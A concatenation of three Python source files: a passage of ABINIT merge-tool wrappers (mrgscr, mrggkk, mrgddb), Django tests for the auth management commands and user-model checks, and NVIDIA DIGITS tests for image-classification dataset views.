if self.mpi_runner and with_mpirun:
args.insert(0, self.mpi_runner)
self.cmd_str = " ".join(args)
p = Popen(self.cmd_str, shell=True, stdout=PIPE, stderr=PIPE, cwd=cwd)
self.stdout_data, self.stderr_data = p.communicate()
self.returncode = p.returncode
if self.returncode != 0:
with open(self.stdout_fname, "r") as out, open(self.stderr_fname, "r") as err:
self.stdout_data = out.read()
self.stderr_data = err.read()
if self.verbose:
print("*** stdout: ***\n", self.stdout_data)
print("*** stderr ***\n", self.stderr_data)
raise self.Error("%s returned %s\n cmd_str: %s" % (self, self.returncode, self.cmd_str))
class MrgscrError(Exception):
"""Error class for Mrgscr"""
class Mrgscr(ExecWrapper):
_name = "mrgscr"
Error = MrgscrError
def merge_qpoints(self, files_to_merge, out_prefix, cwd=None):
"""
Execute mrgscr in a subprocess to merge files_to_merge. Produce new file with prefix out_prefix
If cwd is not None, the child's current directory will be changed to cwd before it is executed.
"""
# We work with absolute paths.
files_to_merge = [os.path.abspath(s) for s in list_strings(files_to_merge)]
nfiles = len(files_to_merge)
if self.verbose:
print("Will merge %d files with output_prefix %s" % (nfiles, out_prefix))
for (i, f) in enumerate(files_to_merge):
print(" [%d] %s" % (i, f))
if nfiles == 1:
raise self.Error("merge_qpoints does not support nfiles == 1")
self.stdin_fname, self.stdout_fname, self.stderr_fname = (
"mrgscr.stdin", "mrgscr.stdout", "mrgscr.stderr")
if cwd is not None:
self.stdin_fname, self.stdout_fname, self.stderr_fname = \
map(os.path.join, 3 * [cwd], [self.stdin_fname, self.stdout_fname, self.stderr_fname])
inp = cStringIO()
inp.write(str(nfiles) + "\n") # Number of files to merge.
inp.write(out_prefix + "\n") # Prefix for the final output file:
for filename in files_to_merge:
inp.write(filename + "\n") # List with the files to merge.
inp.write("1\n") # Option for merging q-points.
self.stdin_data = [s for s in inp.getvalue()]
with open(self.stdin_fname, "w") as fh:
fh.writelines(self.stdin_data)
try:
self.execute(cwd=cwd)
except self.Error:
raise
class MrggkkError(Exception):
"""Error class for Mrggkk."""
class Mrggkk(ExecWrapper):
_name = "mrggkk"
Error = MrggkkError
def merge(self, gswfk_file, dfpt_files, gkk_files, out_gkk, binascii=0, cwd=None):
"""
Merge GGK files, return the absolute path of the new database.
Args:
gswfk_file:
Ground-state WFK filename
dfpt_files:
List of 1WFK files to merge.
gkk_files:
List of GKK files to merge.
out_gkk:
Name of the output GKK file
binascii:
Integer flat. 0 --> binary output, 1 --> ascii formatted output
cwd:
Directory where the subprocess will be executed.
"""
raise NotImplementedError("This method should be tested")
out_gkk = out_gkk if cwd is None else os.path.join(os.path.abspath(cwd), out_gkk)
# We work with absolute paths.
gswfk_file = absath(gswfk_file)
dfpt_files = [os.path.abspath(s) for s in list_strings(dfpt_files)]
gkk_files = [os.path.abspath(s) for s in list_strings(gkk_files)]
if self.verbose:
print("Will merge %d 1WF files, %d GKK file in output %s" %
(len(dfpt_nfiles), len_gkk_files, out_gkk))
for (i, f) in enumerate(dfpt_files):
print(" [%d] 1WF %s" % (i, f))
for (i, f) in enumerate(gkk_files):
print(" [%d] GKK %s" % (i, f))
self.stdin_fname, self.stdout_fname, self.stderr_fname = (
"mrggkk.stdin", "mrggkk.stdout", "mrggkk.stderr")
if cwd is not None:
self.stdin_fname, self.stdout_fname, self.stderr_fname = \
map(os.path.join, 3 * [cwd], [self.stdin_fname, self.stdout_fname, self.stderr_fname])
inp = cStringIO()
inp.write(out_gkk + "\n") # Name of the output file
inp.write(str(binascii) + "\n") # Integer flag: 0 --> binary output, 1 --> ascii formatted output
inp.write(gswfk_file + "\n") # Name of the groud state wavefunction file WF
#dims = len(dfpt_files, gkk_files, ?)
dims = " ".join([str(d) for d in dims])
inp.write(dims + "\n") # Number of 1WF, of GKK files, and number of 1WF files in all the GKK files
# Names of the 1WF files...
for fname in dfpt_files:
inp.write(fname + "\n")
# Names of the GKK files...
for fname in gkk_files:
inp.write(fname + "\n")
self.stdin_data = [s for s in inp.getvalue()]
with open(self.stdin_fname, "w") as fh:
fh.writelines(self.stdin_data)
try:
self.execute(cwd=cwd)
except self.Error:
raise
return out_gkk
class MrgddbError(Exception):
"""Error class for Mrgddb."""
class Mrgddb(ExecWrapper):
_name = "mrgddb"
Error = MrgddbError
def merge(self, ddb_files, out_ddb, description, cwd=None):
"""Merge DDB file, return the absolute path of the new database."""
# We work with absolute paths.
ddb_files = [os.path.abspath(s) for s in list_strings(ddb_files)]
out_ddb = out_ddb if cwd is None else os.path.join(os.path.abspath(cwd), out_ddb)
if self.verbose:
print("Will merge %d files into output DDB %s" % (len(ddb_files), out_ddb))
for (i, f) in enumerate(ddb_files):
print(" [%d] %s" % (i, f))
# Handle the case of a single file since mrgddb uses 1 to denote GS files!
if len(ddb_files) == 1:
with open(ddb_files[0], "r") as inh, open(out_ddb, "w") as out:
for line in inh:
out.write(line)
return out_ddb
self.stdin_fname, self.stdout_fname, self.stderr_fname = (
"mrgddb.stdin", "mrgddb.stdout", "mrgddb.stderr")
if cwd is not None:
self.stdin_fname, self.stdout_fname, self.stderr_fname = \
map(os.path.join, 3 * [cwd], [self.stdin_fname, self.stdout_fname, self.stderr_fname])
inp = cStringIO()
inp.write(out_ddb + "\n") # Name of the output file.
inp.write(str(description) + "\n") # Description.
inp.write(str(len(ddb_files)) + "\n") # Number of input DDBs.
# Names of the DDB files.
for fname in ddb_files:
inp.write(fname + "\n")
self.stdin_data = [s for s in inp.getvalue()]
with open(self.stdin_fname, "w") as fh:
fh.writelines(self.stdin_data)
try:
self.execute(cwd=cwd)
except self.Error:
raise
return out_ddb
|
|
from __future__ import unicode_literals
import locale
import sys
from datetime import date
from django.apps import apps
from django.contrib.auth import management, models
from django.contrib.auth.checks import check_user_model
from django.contrib.auth.management import create_permissions
from django.contrib.auth.management.commands import (
changepassword, createsuperuser,
)
from django.contrib.auth.models import Group, User
from django.contrib.auth.tests.custom_user import CustomUser
from django.contrib.contenttypes.models import ContentType
from django.core import checks, exceptions
from django.core.management import call_command
from django.core.management.base import CommandError
from django.test import TestCase, override_settings, override_system_checks
from django.utils import six
from django.utils.encoding import force_str
from django.utils.translation import ugettext_lazy as _
from .models import (
CustomUserBadRequiredFields, CustomUserNonListRequiredFields,
CustomUserNonUniqueUsername, CustomUserWithFK, Email,
)
def mock_inputs(inputs):
"""
Decorator to temporarily replace input/getpass to allow interactive
createsuperuser.
"""
def inner(test_func):
def wrapped(*args):
class mock_getpass:
@staticmethod
def getpass(prompt=b'Password: ', stream=None):
if six.PY2:
# getpass on Windows only supports prompt as bytestring (#19807)
assert isinstance(prompt, six.binary_type)
return inputs['password']
def mock_input(prompt):
# prompt should be encoded in Python 2. This line will raise an
# Exception if prompt contains unencoded non-ASCII on Python 2.
prompt = str(prompt)
assert str('__proxy__') not in prompt
response = ''
for key, val in inputs.items():
if force_str(key) in prompt.lower():
response = val
break
return response
old_getpass = createsuperuser.getpass
old_input = createsuperuser.input
createsuperuser.getpass = mock_getpass
createsuperuser.input = mock_input
try:
test_func(*args)
finally:
createsuperuser.getpass = old_getpass
createsuperuser.input = old_input
return wrapped
return inner
class MockTTY(object):
"""
A fake stdin object that pretends to be a TTY to be used in conjunction
with mock_inputs.
"""
def isatty(self):
return True
class GetDefaultUsernameTestCase(TestCase):
def setUp(self):
self.old_get_system_username = management.get_system_username
def tearDown(self):
management.get_system_username = self.old_get_system_username
def test_actual_implementation(self):
self.assertIsInstance(management.get_system_username(), six.text_type)
def test_simple(self):
management.get_system_username = lambda: 'joe'
self.assertEqual(management.get_default_username(), 'joe')
def test_existing(self):
models.User.objects.create(username='joe')
management.get_system_username = lambda: 'joe'
self.assertEqual(management.get_default_username(), '')
self.assertEqual(
management.get_default_username(check_db=False), 'joe')
def test_i18n(self):
# 'Julia' with accented 'u':
management.get_system_username = lambda: 'J\xfalia'
self.assertEqual(management.get_default_username(), 'julia')
class ChangepasswordManagementCommandTestCase(TestCase):
def setUp(self):
self.user = models.User.objects.create_user(username='joe', password='qwerty')
self.stdout = six.StringIO()
self.stderr = six.StringIO()
def tearDown(self):
self.stdout.close()
self.stderr.close()
def test_that_changepassword_command_changes_joes_password(self):
"Executing the changepassword management command should change joe's password"
self.assertTrue(self.user.check_password('qwerty'))
command = changepassword.Command()
command._get_pass = lambda *args: 'not qwerty'
command.execute(username="joe", stdout=self.stdout)
command_output = self.stdout.getvalue().strip()
self.assertEqual(
command_output,
"Changing password for user 'joe'\nPassword changed successfully for user 'joe'"
)
self.assertTrue(models.User.objects.get(username="joe").check_password("not qwerty"))
def test_that_max_tries_exits_1(self):
"""
A CommandError should be thrown by handle() if the user enters in
mismatched passwords three times.
"""
command = changepassword.Command()
command._get_pass = lambda *args: args or 'foo'
with self.assertRaises(CommandError):
command.execute(username="joe", stdout=self.stdout, stderr=self.stderr)
def test_that_changepassword_command_works_with_nonascii_output(self):
"""
#21627 -- Executing the changepassword management command should allow
non-ASCII characters from the User object representation.
"""
# 'Julia' with accented 'u':
models.User.objects.create_user(username='J\xfalia', password='qwerty')
command = changepassword.Command()
command._get_pass = lambda *args: 'not qwerty'
command.execute(username="J\xfalia", stdout=self.stdout)
@override_settings(SILENCED_SYSTEM_CHECKS=['fields.W342']) # ForeignKey(unique=True)
class CreatesuperuserManagementCommandTestCase(TestCase):
def test_basic_usage(self):
"Check the operation of the createsuperuser management command"
# We can use the management command to create a superuser
new_io = six.StringIO()
call_command(
"createsuperuser",
interactive=False,
username="joe",
email="joe@somewhere.org",
stdout=new_io
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = User.objects.get(username="joe")
self.assertEqual(u.email, 'joe@somewhere.org')
# created password should be unusable
self.assertFalse(u.has_usable_password())
@mock_inputs({'password': "nopasswd"})
def test_nolocale(self):
"""
Check that createsuperuser does not break when no locale is set. See
ticket #16017.
"""
old_getdefaultlocale = locale.getdefaultlocale
try:
# Temporarily remove locale information
locale.getdefaultlocale = lambda: (None, None)
# Call the command in this new environment
call_command(
"createsuperuser",
interactive=True,
username="nolocale@somewhere.org",
email="nolocale@somewhere.org",
verbosity=0,
stdin=MockTTY(),
)
except TypeError:
self.fail("createsuperuser fails if the OS provides no information about the current locale")
finally:
# Re-apply locale information
locale.getdefaultlocale = old_getdefaultlocale
# If we were successful, a user should have been created
u = User.objects.get(username="nolocale@somewhere.org")
self.assertEqual(u.email, 'nolocale@somewhere.org')
@mock_inputs({
'password': "nopasswd",
'u\u017eivatel': 'foo', # username (cz)
'email': 'nolocale@somewhere.org'})
def test_non_ascii_verbose_name(self):
username_field = User._meta.get_field('username')
old_verbose_name = username_field.verbose_name
username_field.verbose_name = _('u\u017eivatel')
new_io = six.StringIO()
try:
call_command(
"createsuperuser",
interactive=True,
stdout=new_io,
stdin=MockTTY(),
)
finally:
username_field.verbose_name = old_verbose_name
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
def test_verbosity_zero(self):
# We can suppress output on the management command
new_io = six.StringIO()
call_command(
"createsuperuser",
interactive=False,
username="joe2",
email="joe2@somewhere.org",
verbosity=0,
stdout=new_io
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, '')
u = User.objects.get(username="joe2")
self.assertEqual(u.email, 'joe2@somewhere.org')
self.assertFalse(u.has_usable_password())
def test_email_in_username(self):
new_io = six.StringIO()
call_command(
"createsuperuser",
interactive=False,
username="joe+admin@somewhere.org",
email="joe@somewhere.org",
stdout=new_io
)
u = User._default_manager.get(username="joe+admin@somewhere.org")
self.assertEqual(u.email, 'joe@somewhere.org')
self.assertFalse(u.has_usable_password())
@override_settings(AUTH_USER_MODEL='auth.CustomUser')
def test_swappable_user(self):
"A superuser can be created when a custom User model is in use"
# We can use the management command to create a superuser
# We skip validation because the temporary substitution of the
# swappable User model messes with validation.
new_io = six.StringIO()
call_command(
"createsuperuser",
interactive=False,
email="joe@somewhere.org",
date_of_birth="1976-04-01",
stdout=new_io,
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = CustomUser._default_manager.get(email="joe@somewhere.org")
self.assertEqual(u.date_of_birth, date(1976, 4, 1))
# created password should be unusable
self.assertFalse(u.has_usable_password())
@override_settings(AUTH_USER_MODEL='auth.CustomUser')
def test_swappable_user_missing_required_field(self):
"A Custom superuser won't be created when a required field isn't provided"
# We can use the management command to create a superuser
# We skip validation because the temporary substitution of the
# swappable User model messes with validation.
new_io = six.StringIO()
with self.assertRaises(CommandError):
call_command(
"createsuperuser",
interactive=False,
username="joe@somewhere.org",
stdout=new_io,
stderr=new_io,
)
self.assertEqual(CustomUser._default_manager.count(), 0)
def test_skip_if_not_in_TTY(self):
"""
If the command is not called from a TTY, it should be skipped and a
message should be displayed (#7423).
"""
class FakeStdin(object):
"""A fake stdin object that has isatty() return False."""
def isatty(self):
return False
out = six.StringIO()
call_command(
"createsuperuser",
stdin=FakeStdin(),
stdout=out,
interactive=True,
)
self.assertEqual(User._default_manager.count(), 0)
self.assertIn("Superuser creation skipped", out.getvalue())
def test_passing_stdin(self):
"""
You can pass a stdin object as an option and it should be
available on self.stdin.
If no such option is passed, it defaults to sys.stdin.
"""
sentinel = object()
command = createsuperuser.Command()
command.check = lambda: []
command.execute(
stdin=sentinel,
stdout=six.StringIO(),
stderr=six.StringIO(),
interactive=False,
verbosity=0,
username='janet',
email='janet@example.com',
)
self.assertIs(command.stdin, sentinel)
command = createsuperuser.Command()
command.check = lambda: []
command.execute(
stdout=six.StringIO(),
stderr=six.StringIO(),
interactive=False,
verbosity=0,
username='joe',
email='joe@example.com',
)
self.assertIs(command.stdin, sys.stdin)
@override_settings(AUTH_USER_MODEL='auth.CustomUserWithFK')
def test_fields_with_fk(self):
new_io = six.StringIO()
group = Group.objects.create(name='mygroup')
email = Email.objects.create(email='mymail@gmail.com')
call_command(
'createsuperuser',
interactive=False,
username=email.pk,
email=email.email,
group=group.pk,
stdout=new_io,
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = CustomUserWithFK._default_manager.get(email=email)
self.assertEqual(u.username, email)
self.assertEqual(u.group, group)
non_existent_email = 'mymail2@gmail.com'
with self.assertRaisesMessage(CommandError,
'email instance with email %r does not exist.' % non_existent_email):
call_command(
'createsuperuser',
interactive=False,
username=email.pk,
email=non_existent_email,
stdout=new_io,
)
@override_settings(AUTH_USER_MODEL='auth.CustomUserWithFK')
def test_fields_with_fk_interactive(self):
new_io = six.StringIO()
group = Group.objects.create(name='mygroup')
email = Email.objects.create(email='mymail@gmail.com')
@mock_inputs({
'password': 'nopasswd',
'username (email.id)': email.pk,
'email (email.email)': email.email,
'group (group.id)': group.pk,
})
def test(self):
call_command(
'createsuperuser',
interactive=True,
stdout=new_io,
stdin=MockTTY(),
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = CustomUserWithFK._default_manager.get(email=email)
self.assertEqual(u.username, email)
self.assertEqual(u.group, group)
test(self)
class CustomUserModelValidationTestCase(TestCase):
@override_settings(AUTH_USER_MODEL='auth.CustomUserNonListRequiredFields')
@override_system_checks([check_user_model])
def test_required_fields_is_list(self):
"REQUIRED_FIELDS should be a list."
errors = checks.run_checks()
expected = [
checks.Error(
"'REQUIRED_FIELDS' must be a list or tuple.",
hint=None,
obj=CustomUserNonListRequiredFields,
id='auth.E001',
),
]
self.assertEqual(errors, expected)
@override_settings(AUTH_USER_MODEL='auth.CustomUserBadRequiredFields')
@override_system_checks([check_user_model])
def test_username_not_in_required_fields(self):
"USERNAME_FIELD should not appear in REQUIRED_FIELDS."
errors = checks.run_checks()
expected = [
checks.Error(
("The field named as the 'USERNAME_FIELD' for a custom user model "
"must not be included in 'REQUIRED_FIELDS'."),
hint=None,
obj=CustomUserBadRequiredFields,
id='auth.E002',
),
]
self.assertEqual(errors, expected)
@override_settings(AUTH_USER_MODEL='auth.CustomUserNonUniqueUsername')
@override_system_checks([check_user_model])
def test_username_non_unique(self):
"A non-unique USERNAME_FIELD should raise a model validation error."
errors = checks.run_checks()
expected = [
checks.Error(
("'CustomUserNonUniqueUsername.username' must be "
"unique because it is named as the 'USERNAME_FIELD'."),
hint=None,
obj=CustomUserNonUniqueUsername,
id='auth.E003',
),
]
self.assertEqual(errors, expected)
@override_settings(AUTH_USER_MODEL='auth.CustomUserNonUniqueUsername',
AUTHENTICATION_BACKENDS=[
'my.custom.backend',
])
@override_system_checks([check_user_model])
def test_username_non_unique_with_custom_backend(self):
""" A non-unique USERNAME_FIELD should raise an error only if we use the
default authentication backend. Otherwise, an warning should be raised.
"""
errors = checks.run_checks()
expected = [
checks.Warning(
("'CustomUserNonUniqueUsername.username' is named as "
"the 'USERNAME_FIELD', but it is not unique."),
hint=('Ensure that your authentication backend(s) can handle '
'non-unique usernames.'),
obj=CustomUserNonUniqueUsername,
id='auth.W004',
)
]
self.assertEqual(errors, expected)
class PermissionTestCase(TestCase):
def setUp(self):
self._original_permissions = models.Permission._meta.permissions[:]
self._original_default_permissions = models.Permission._meta.default_permissions
self._original_verbose_name = models.Permission._meta.verbose_name
def tearDown(self):
models.Permission._meta.permissions = self._original_permissions
models.Permission._meta.default_permissions = self._original_default_permissions
models.Permission._meta.verbose_name = self._original_verbose_name
ContentType.objects.clear_cache()
def test_duplicated_permissions(self):
"""
Test that we show proper error message if we are trying to create
duplicate permissions.
"""
auth_app_config = apps.get_app_config('auth')
# check duplicated default permission
models.Permission._meta.permissions = [
('change_permission', 'Can edit permission (duplicate)')]
six.assertRaisesRegex(self, CommandError,
"The permission codename 'change_permission' clashes with a "
"builtin permission for model 'auth.Permission'.",
create_permissions, auth_app_config, verbosity=0)
# check duplicated custom permissions
models.Permission._meta.permissions = [
('my_custom_permission', 'Some permission'),
('other_one', 'Some other permission'),
('my_custom_permission', 'Some permission with duplicate permission code'),
]
six.assertRaisesRegex(self, CommandError,
"The permission codename 'my_custom_permission' is duplicated for model "
"'auth.Permission'.",
create_permissions, auth_app_config, verbosity=0)
# should not raise anything
models.Permission._meta.permissions = [
('my_custom_permission', 'Some permission'),
('other_one', 'Some other permission'),
]
create_permissions(auth_app_config, verbosity=0)
def test_default_permissions(self):
auth_app_config = apps.get_app_config('auth')
permission_content_type = ContentType.objects.get_by_natural_key('auth', 'permission')
models.Permission._meta.permissions = [
('my_custom_permission', 'Some permission'),
]
create_permissions(auth_app_config, verbosity=0)
# add/change/delete permission by default + custom permission
self.assertEqual(models.Permission.objects.filter(
content_type=permission_content_type,
).count(), 4)
models.Permission.objects.filter(content_type=permission_content_type).delete()
models.Permission._meta.default_permissions = []
create_permissions(auth_app_config, verbosity=0)
# custom permission only since default permissions is empty
self.assertEqual(models.Permission.objects.filter(
content_type=permission_content_type,
).count(), 1)
def test_verbose_name_length(self):
auth_app_config = apps.get_app_config('auth')
permission_content_type = ContentType.objects.get_by_natural_key('auth', 'permission')
models.Permission.objects.filter(content_type=permission_content_type).delete()
models.Permission._meta.verbose_name = "some ridiculously long verbose name that is out of control" * 5
six.assertRaisesRegex(self, exceptions.ValidationError,
"The verbose_name of auth.permission is longer than 244 characters",
create_permissions, auth_app_config, verbosity=0)
|
|
# Copyright (c) 2014-2016, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
import json
import os
import shutil
import tempfile
# Find the best implementation available
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
from bs4 import BeautifulSoup
import PIL.Image
from .test_imageset_creator import create_classification_imageset
from digits import test_utils
import digits.test_views
# May be too short on a slow system
TIMEOUT_DATASET = 45
################################################################################
# Base classes (they don't start with "Test" so nose won't run them)
################################################################################
class BaseViewsTest(digits.test_views.BaseViewsTest):
"""
Provides some functions
"""
@classmethod
def dataset_exists(cls, job_id):
return cls.job_exists(job_id, 'datasets')
@classmethod
def dataset_status(cls, job_id):
return cls.job_status(job_id, 'datasets')
@classmethod
def dataset_info(cls, job_id):
return cls.job_info(job_id, 'datasets')
@classmethod
def abort_dataset(cls, job_id):
return cls.abort_job(job_id, job_type='datasets')
@classmethod
def dataset_wait_completion(cls, job_id, **kwargs):
kwargs['job_type'] = 'datasets'
if 'timeout' not in kwargs:
kwargs['timeout'] = TIMEOUT_DATASET
return cls.job_wait_completion(job_id, **kwargs)
@classmethod
def delete_dataset(cls, job_id):
return cls.delete_job(job_id, job_type='datasets')
class BaseViewsTestWithImageset(BaseViewsTest):
"""
Provides an imageset and some functions
"""
# Inherited classes may want to override these default attributes
IMAGE_COUNT = 10 # per class
IMAGE_HEIGHT = 10
IMAGE_WIDTH = 10
IMAGE_CHANNELS = 3
BACKEND = 'lmdb'
ENCODING = 'png'
COMPRESSION = 'none'
UNBALANCED_CATEGORY = False
@classmethod
def setUpClass(cls):
super(BaseViewsTestWithImageset, cls).setUpClass()
cls.imageset_folder = tempfile.mkdtemp()
# create imageset
cls.imageset_paths = create_classification_imageset(
cls.imageset_folder,
image_count=cls.IMAGE_COUNT,
add_unbalanced_category=cls.UNBALANCED_CATEGORY,
)
cls.created_datasets = []
@classmethod
def tearDownClass(cls):
# delete any created datasets
for job_id in cls.created_datasets:
cls.delete_dataset(job_id)
# delete imageset
shutil.rmtree(cls.imageset_folder)
super(BaseViewsTestWithImageset, cls).tearDownClass()
@classmethod
def create_dataset(cls, **kwargs):
"""
Create a dataset
Returns the job_id
Raises RuntimeError if job fails to create
Keyword arguments:
**kwargs -- data to be sent with POST request
"""
data = {
'dataset_name': 'test_dataset',
'group_name': 'test_group',
'method': 'folder',
'folder_train': cls.imageset_folder,
'resize_channels': cls.IMAGE_CHANNELS,
'resize_width': cls.IMAGE_WIDTH,
'resize_height': cls.IMAGE_HEIGHT,
'backend': cls.BACKEND,
'encoding': cls.ENCODING,
'compression': cls.COMPRESSION,
}
data.update(kwargs)
request_json = data.pop('json', False)
url = '/datasets/images/classification'
if request_json:
url += '.json'
rv = cls.app.post(url, data=data)
if request_json:
if rv.status_code != 200:
print json.loads(rv.data)
raise RuntimeError('Model creation failed with %s' % rv.status_code)
return json.loads(rv.data)['id']
# expect a redirect
if not 300 <= rv.status_code <= 310:
s = BeautifulSoup(rv.data, 'html.parser')
div = s.select('div.alert-danger')
if div:
print div[0]
else:
print rv.data
raise RuntimeError('Failed to create dataset - status %s' % rv.status_code)
job_id = cls.job_id_from_response(rv)
assert cls.dataset_exists(job_id), 'dataset not found after successful creation'
cls.created_datasets.append(job_id)
return job_id
@classmethod
def categoryCount(cls):
return len(cls.imageset_paths.keys())
class BaseViewsTestWithDataset(BaseViewsTestWithImageset):
"""
Provides a dataset and some functions
"""
@classmethod
def setUpClass(cls):
super(BaseViewsTestWithDataset, cls).setUpClass()
cls.dataset_id = cls.create_dataset(json=True)
assert cls.dataset_wait_completion(cls.dataset_id) == 'Done', 'create failed'
def test_clone(self):
options_1 = {
'encoding': 'png',
'folder_pct_test': 0,
'folder_pct_val': 25,
'folder_test': '',
'folder_test_max_per_class': None,
'folder_test_min_per_class': 2,
'folder_train_max_per_class': 3,
'folder_train_min_per_class': 1,
'folder_val_max_per_class': None,
'folder_val_min_per_class': 2,
'resize_mode': 'half_crop',
}
job1_id = self.create_dataset(**options_1)
assert self.dataset_wait_completion(job1_id) == 'Done', 'first job failed'
rv = self.app.get('/datasets/%s.json' % job1_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content1 = json.loads(rv.data)
# Clone job1 as job2
options_2 = {
'clone': job1_id,
}
job2_id = self.create_dataset(**options_2)
assert self.dataset_wait_completion(job2_id) == 'Done', 'second job failed'
rv = self.app.get('/datasets/%s.json' % job2_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content2 = json.loads(rv.data)
# These will be different
content1.pop('id')
content2.pop('id')
content1.pop('directory')
content2.pop('directory')
assert (content1 == content2), 'job content does not match'
job1 = digits.webapp.scheduler.get_job(job1_id)
job2 = digits.webapp.scheduler.get_job(job2_id)
assert (job1.form_data == job2.form_data), 'form content does not match'
################################################################################
# Test classes
################################################################################
class TestViews(BaseViewsTest, test_utils.DatasetMixin):
"""
Tests which don't require an imageset or a dataset
"""
def test_page_dataset_new(self):
rv = self.app.get('/datasets/images/classification/new')
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
assert 'New Image Classification Dataset' in rv.data, 'unexpected page format'
def test_nonexistent_dataset(self):
assert not self.dataset_exists('foo'), "dataset shouldn't exist"
class TestCreation(BaseViewsTestWithImageset, test_utils.DatasetMixin):
"""
Dataset creation tests
"""
def test_nonexistent_folder(self):
try:
self.create_dataset(
folder_train='/not-a-directory'
)
except RuntimeError:
return
raise AssertionError('Should have failed')
def test_create_json(self):
job_id = self.create_dataset(json=True)
self.abort_dataset(job_id)
def test_create_delete(self):
job_id = self.create_dataset()
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
def test_create_abort_delete(self):
job_id = self.create_dataset()
assert self.abort_dataset(job_id) == 200, 'abort failed'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
def test_create_wait_delete(self):
job_id = self.create_dataset()
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
def test_textfiles(self):
for absolute_path in (True, False):
for local_path in (True, False):
yield self.check_textfiles, absolute_path, local_path
def check_textfiles(self, absolute_path=True, local_path=True):
"""
Create a dataset from textfiles
Arguments:
absolute_path -- if False, give relative paths and image folders
"""
textfile_train_images = ''
textfile_labels_file = ''
label_id = 0
for label, images in self.imageset_paths.iteritems():
textfile_labels_file += '%s\n' % label
for image in images:
image_path = image
if absolute_path:
image_path = os.path.join(self.imageset_folder, image_path)
textfile_train_images += '%s %d\n' % (image_path, label_id)
label_id += 1
data = {
'method': 'textfile',
'textfile_use_val': 'y',
}
if local_path:
train_file = os.path.join(self.imageset_folder, "local_train.txt")
labels_file = os.path.join(self.imageset_folder, "local_labels.txt")
# create files in local filesystem - these will be removed in tearDownClass() function
with open(train_file, "w") as outfile:
outfile.write(textfile_train_images)
with open(labels_file, "w") as outfile:
outfile.write(textfile_labels_file)
data['textfile_use_local_files'] = 'True'
data['textfile_local_train_images'] = train_file
# Use the same file for training and validation.
data['textfile_local_val_images'] = train_file
data['textfile_local_labels_file'] = labels_file
else:
# StringIO wrapping is needed to simulate POST file upload.
train_upload = (StringIO(textfile_train_images), "train.txt")
# Use the same list for training and validation.
val_upload = (StringIO(textfile_train_images), "val.txt")
labels_upload = (StringIO(textfile_labels_file), "labels.txt")
data['textfile_train_images'] = train_upload
data['textfile_val_images'] = val_upload
data['textfile_labels_file'] = labels_upload
if not absolute_path:
data['textfile_train_folder'] = self.imageset_folder
data['textfile_val_folder'] = self.imageset_folder
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
def test_abort_explore_fail(self):
job_id = self.create_dataset()
self.abort_dataset(job_id)
rv = self.app.get('/datasets/images/classification/explore?job_id=%s&db=val' % job_id)
assert rv.status_code == 500, 'page load should have failed'
assert 'status should be' in rv.data, 'unexpected page format'
class TestImageCount(BaseViewsTestWithImageset, test_utils.DatasetMixin):
def test_image_count(self):
for type in ['train', 'val', 'test']:
yield self.check_image_count, type
def check_image_count(self, type):
data = {'folder_pct_val': 20,
'folder_pct_test': 10}
if type == 'val':
data['has_val_folder'] = 'True'
data['folder_val'] = self.imageset_folder
elif type == 'test':
data['has_test_folder'] = 'True'
data['folder_test'] = self.imageset_folder
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
info = self.dataset_info(job_id)
if type == 'train':
assert len(info['ParseFolderTasks']) == 1, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][0]
image_count = parse_info['train_count'] + parse_info['val_count'] + parse_info['test_count']
assert parse_info['val_count'] == 0.2 * image_count
assert parse_info['test_count'] == 0.1 * image_count
else:
assert len(info['ParseFolderTasks']) == 2, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][1]
if type == 'val':
assert parse_info['train_count'] == 0
assert parse_info['test_count'] == 0
image_count = parse_info['val_count']
else:
assert parse_info['train_count'] == 0
assert parse_info['val_count'] == 0
image_count = parse_info['test_count']
assert self.categoryCount() == parse_info['label_count']
assert image_count == self.IMAGE_COUNT * parse_info['label_count'], 'image count mismatch'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
class TestMaxPerClass(BaseViewsTestWithImageset, test_utils.DatasetMixin):
def test_max_per_class(self):
for type in ['train', 'val', 'test']:
yield self.check_max_per_class, type
def check_max_per_class(self, type):
# create dataset, asking for at most IMAGE_COUNT/2 images per class
assert self.IMAGE_COUNT % 2 == 0
max_per_class = self.IMAGE_COUNT / 2
data = {'folder_pct_val': 0}
if type == 'train':
data['folder_train_max_per_class'] = max_per_class
if type == 'val':
data['has_val_folder'] = 'True'
data['folder_val'] = self.imageset_folder
data['folder_val_max_per_class'] = max_per_class
elif type == 'test':
data['has_test_folder'] = 'True'
data['folder_test'] = self.imageset_folder
data['folder_test_max_per_class'] = max_per_class
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
info = self.dataset_info(job_id)
if type == 'train':
assert len(info['ParseFolderTasks']) == 1, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][0]
else:
assert len(info['ParseFolderTasks']) == 2, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][1]
image_count = parse_info['train_count'] + parse_info['val_count'] + parse_info['test_count']
assert image_count == max_per_class * parse_info['label_count'], 'image count mismatch'
